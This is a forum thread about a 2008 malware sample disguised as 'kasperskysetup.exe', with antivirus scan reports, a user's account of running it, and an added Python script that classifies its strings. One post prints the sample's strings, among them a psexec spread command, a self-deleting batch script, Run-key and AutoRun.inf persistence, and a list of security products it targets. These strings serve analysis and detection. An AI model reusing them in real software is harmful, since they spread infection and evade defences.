Thread starter: chenrui19930

[Virus sample] An EXE-infecting DOWNLOADER, very stealthy! Who dares to run it?

chenrui19930
Thread starter | Posted on 2008-1-30 14:38:38
Has anyone tried the file-infection function?
taiw_1144
Posted on 2008-1-30 14:53:17
Original post by chenrui19930 on 2008-1-30 13:59:
But it seems it can't be deleted

Delayed deletion: it can be deleted after a reboot.
冷冷
Posted on 2008-1-30 15:06:48

Reply to chenrui19930 in post #21

I have a file-infecting virus
but I need to look for it

[ This post was last edited by 冷_冷 on 2008-1-30 15:09 ]
千里同风
Posted on 2008-1-30 15:13:23
00423AE4: '%s\psexec.exe \\%s -u %s -p %s -c %s\servrr.exe -d',0
00423B18: 'http://tools.hxstat.com/ip/',0
00423B38: 'input name="ip"',0
00423B4C: '%s%d.%d',0
00423B54: '%s\ArpW.exe',0
00423B60: '%s\nogui.exe',0
00423B70: '%s\wpcap.dll',0
00423B80: '%s\packet.dll',0
00423B90: '%s\wanpacket.dll',0
00423BA4: '%s/arp.exe',0
00423BB0: '%s/nogui.exe',0
00423BC0: '%s/wpcap.dll',0
00423BD0: '%s/packet.dll',0
00423BE0: '%s/wanpacket.dll',0
00423BF4: '%s\ArpW.exe -idx 0 -ip %s -port 80 -insert "%s"',0
00423C24: '%s2-%s255',0
00423C30: '%s\BindF.exe',0
00423C40: '%s%d',0
00423C48: 'iphlpapi.dll',0
00423C58: 'GetTcpTable',0
00423C64: 'GetUdpTable',0
00423C70: 'SetTcpEntry',0
00423C7C: '0.0.0.0',0
00423C84: '127.0.0.1',0
00423C94: '%s\rs.bat',0
00423CA0: '@echo off',0Dh,0Ah,':start',0Dh,0Ah,'if not exist ""%1"" goto done',0Dh,0Ah,'del /F ""%1""',0Dh,0Ah,'del ""%1""',0Dh,0Ah,'goto start',0Dh,0Ah,':done',0Dh,0Ah,'del /F %temp%',0Dh,'s.bat',0Dh,0Ah,'del %temp%',0Dh,'.bat',0Dh,0Ah,0
00423D28: '%%comspec%% /c %s %s',0
00423D40: '\IME\svchost.exe',0
00423D54: '8403',0
00423D5C: 'Alerter COM+',0
00423D6C: 'Alerter COM+',0
00423D7C: 'Alerter COM+',0
00423D90: '\IME\svchost.exe',0
00423DA4: 'Alerter COM+',0
00423DB4: 'Alerter COM+',0
00423DC4: 'Alerter COM+',0
00423DD4: 'WebDown',0
00423DDC: 'Alerter COM+',0
00423DEC: 'Software\Microsoft\Windows\CurrentVersion\Run',0
00423E1C: '%s\internt.exe',0
00423E2C: '%s\progmon.exe',0
00423E3C: 'Internt',0
00423E44: 'Program file',0
00423E54: 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL',0
00423EA8: 'CheckedValue',0
00423EB8: '%s\%d.exe',0
00423F10: 'Process',0
00423F4C: 'Firewall',0
00423F58: 'virus',0
00423F60: 'anti',0
00423F84: 'worm',0
00423FA8: 'micropoint',0
00423FC4: 'Kaspersky',0
00423FD4: 'F-Secure',0
00423FE0: 'eScan',0
00423FE8: 'Norton',0
00423FF8: 'McAfee',0
00424000: 'Virus',0
00424008: 'Panda',0
00424018: 'Trojan',0
00424020: 'Door',0
00424034: '[AutoRun]',0Dh,0Ah,0
00424040: 'open=%s',0Dh,0Ah,0
00424064: 'shellopenCommand=%s',0Dh,0Ah,0
0042407C: 'shellopenDefault=1',0Dh,0Ah,0
004240B4: 'shell\explore\command=%s',0Dh,0Ah,0
004240D0: '\IME\svchost.exe',0
004240E4: '%c:\setup.exe',0
004240F4: '%c:\AutoRun.inf',0
00424104: 'setup.exe',0
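The string dump above already tells a triage analyst most of what the sample does: a Run-key entry, an AutoRun.inf written to every drive root, a self-deleting batch file, psexec for spreading, and a list of security-product names. The following Python script is an added example (not code from the post or from the sample); it parses the `ADDRESS: 'text',0Dh,0Ah,0` listing format shown above, decodes the byte tokens, and sorts each string into a category so the behaviour tags can be read off mechanically. The sample lines are copied from the dump above; the category names, the keyword list and the behaviour tags are the example's own heuristics, not anything the post defines.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the string-dump lines quoted in the post
# above, in the "ADDRESS: 'text',0Dh,0Ah,0" listing format.
SAMPLE_DUMP_LINES = [
    r"00423AE4: '%s\psexec.exe \\%s -u %s -p %s -c %s\servrr.exe -d',0",
    r"00423B18: 'http://tools.hxstat.com/ip/',0",
    r"00423C48: 'iphlpapi.dll',0",
    r"00423C58: 'GetTcpTable',0",
    r"00423C70: 'SetTcpEntry',0",
    "00423CA0: '@echo off',0Dh,0Ah,':start',0Dh,0Ah,'if not exist \"\"%1\"\" goto done',0Dh,0Ah,'del /F \"\"%1\"\"',0Dh,0Ah,'goto start',0Dh,0Ah,0",
    r"00423D40: '\IME\svchost.exe',0",
    r"00423DEC: 'Software\Microsoft\Windows\CurrentVersion\Run',0",
    r"00423E54: 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL',0",
    r"00423FC4: 'Kaspersky',0",
    r"00423FE8: 'Norton',0",
    r"00424034: '[AutoRun]',0Dh,0Ah,0",
    r"00424040: 'open=%s',0Dh,0Ah,0",
    r"004240F4: '%c:\AutoRun.inf',0",
]

LINE_RE = re.compile(r"^([0-9A-Fa-f]{8}):\s*(.*)$")
# Tokens: a single-quoted run, a hex byte such as 0Dh, or a decimal byte such as 0.
TOKEN_RE = re.compile(r"'([^']*)'|([0-9A-Fa-f]+)h|(\d+)")

# Product/keyword list taken from the dump; a process whose name contains one
# of these is what the sample appears to look for (heuristic label only).
AV_WORDS = {"firewall", "virus", "anti", "worm", "micropoint", "kaspersky",
            "f-secure", "escan", "norton", "mcafee", "panda", "trojan", "door"}


def decode_line(line):
    """Turn one listing line into (address, decoded text), or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = []
    for quoted, hexbyte, decbyte in TOKEN_RE.findall(m.group(2)):
        if quoted:
            parts.append(quoted)
        elif hexbyte:
            parts.append(chr(int(hexbyte, 16)))   # 0Dh -> '\r', 0Ah -> '\n'
        elif decbyte:
            parts.append(chr(int(decbyte)))       # trailing 0 -> NUL terminator
    return int(m.group(1), 16), "".join(parts).rstrip("\x00")


def classify(text):
    """Heuristic category for one decoded string (test order matters)."""
    low = text.lower()
    if low.startswith(("http://", "https://")):
        return "url"
    if low.startswith("software\\"):
        return "registry_key"
    if low.startswith(("[autorun]", "open=", "shell")) or low.endswith("autorun.inf"):
        return "autorun_inf"
    if low.startswith("@echo off"):
        return "batch_script"
    if "psexec.exe" in low:
        return "lateral_tool"
    if re.fullmatch(r"[\w-]+\.dll", low):
        return "import_library"
    if re.fullmatch(r"(Get|Set)[A-Z]\w+", text):
        return "api_name"
    if low in AV_WORDS:
        return "av_keyword"
    if re.search(r"\.(exe|dll|bat)$", low):
        return "drop_path"
    return "other"


def triage(dump_lines):
    """Group every decodable line by category: {category: [(addr, text), ...]}."""
    found = defaultdict(list)
    for line in dump_lines:
        decoded = decode_line(line)
        if decoded:
            found[classify(decoded[1])].append(decoded)
    return dict(found)


# (behaviour tag, category to look in, lower-case substring the text must contain)
BEHAVIOUR_RULES = [
    ("run_key_persistence", "registry_key", "currentversion\\run"),
    ("hides_hidden_files", "registry_key", "showall"),
    ("removable_media_autorun", "autorun_inf", ""),
    ("psexec_lateral_movement", "lateral_tool", ""),
    ("security_product_targeting", "av_keyword", ""),
    ("self_delete_batch", "batch_script", "del "),
]


def behaviours(found):
    """Map the categorized strings onto coarse behaviour tags for a triage note."""
    return {tag for tag, cat, needle in BEHAVIOUR_RULES
            if any(needle in text.lower() for _, text in found.get(cat, []))}


if __name__ == "__main__":
    found = triage(SAMPLE_DUMP_LINES)
    for category, items in sorted(found.items()):
        for addr, text in items:
            print(f"{addr:08X}  {category:<14} {text!r}")
    print("behaviour tags:", ", ".join(sorted(behaviours(found))))
```

The classifier is deliberately order-sensitive: the psexec command line ends in `-d`, not `.exe`, so it must be matched as a lateral-movement tool before the generic drop-path rule, and bare `.dll` names are imports rather than dropped files, while `%s\wpcap.dll` style paths are. On a real dump, the `other` bucket is where the format strings like `%s2-%s255` land; those are worth a second look because they show how the scan range is built.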
xlys
Posted on 2008-1-30 16:29:15
对象: kasperskysetup.exe
        在压缩档案里: D:\Documents\桌面\kasperskysetup.rar
        状态: 已发现病毒
        病毒: Worm.Win32.AutoRun.bje (KAV 引擎)
对象: kasperskysetup.rar
        路径: D:\Documents\桌面
        状态: 已发现病毒
        病毒: Worm.Win32.AutoRun.bje (KAV 引擎)
分析完成: 2008-1-30 16:29
    已扫描 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件
wyqtc1988
Posted on 2008-1-30 16:32:50
Killed by Avira; looks like I won't get a chance to run it.
ballakay
Posted on 2008-1-30 18:28:47
Scanning Report
30 January 2008 18:28:02 - 18:28:07
Computer name: PUMA-PC
Scanning type: Scan target
Target: C:\Users\Administrator\Desktop\kasperskysetup.rar


--------------------------------------------------------------------------------

Result: 1 malware found
Worm.Win32.AutoRun.bje (virus)
C:\Users\Administrator\Desktop\kasperskysetup.rar\kasperskysetup.exe




--------------------------------------------------------------------------------

Statistics
Scanned:
Files: 2
Not scanned: 0
Result:
Viruses: 1
Spyware: 0
Suspicious items: 0
Riskware: 0
Actions:
Disinfected: 0
Renamed: 0
Deleted: 0
Quarantined: 0
Failed: 0
Boot Sectors:
Scanned: 0
Infected: 0
Suspicious items: 0
Disinfected: 0


--------------------------------------------------------------------------------

Options
Definitions version:
Viruses: 2008-01-30_06
Spyware: 2008-01-30_05
Scanning Engines:
F-Secure AVP: 7.00.171, 2008-01-30
F-Secure Libra: 2.04.01, 2008-01-29
F-Secure Orion: 1.02.37, 2008-01-30
F-Secure Draco: 1.00.35, 2008-01-28
Scanning options:
Scan all files
Scan inside archives
Actions:
Viruses: Delete infected files
Spyware: Delete infected files
gho
Posted on 2008-1-30 18:30:06
扫描报告
2008年1月30日 18:29:35 - 18:29:36
计算机名称: CN-89FF4B9EA4D6
扫描类型: 扫描目标
目标: E:\Documents and Settings\Administrator\桌面\kasperskysetup.exe


--------------------------------------------------------------------------------

结果: 找到 1 恶意软件
Worm.Win32.AutoRun.bje (病毒)
E:\Documents and Settings\Administrator\桌面\kasperskysetup.exe 操作: 已隔离
hj5abc
Posted on 2008-1-30 18:32:09
Nothing much.

I ran it and the exe wasn't infected; it only dropped an svchost in the IME folder and tried to download progam.exe and internt.exe, but that apparently didn't succeed.

Everything in temp, whether downloaded or dropped, is dead, except for one self-deleting BAT.

Wsyscheck just terminated and deleted the process and it was done for...

qigang
Posted on 2008-1-30 19:02:05

2/1

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Worm.Win32.Agent.zfm     

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.29.22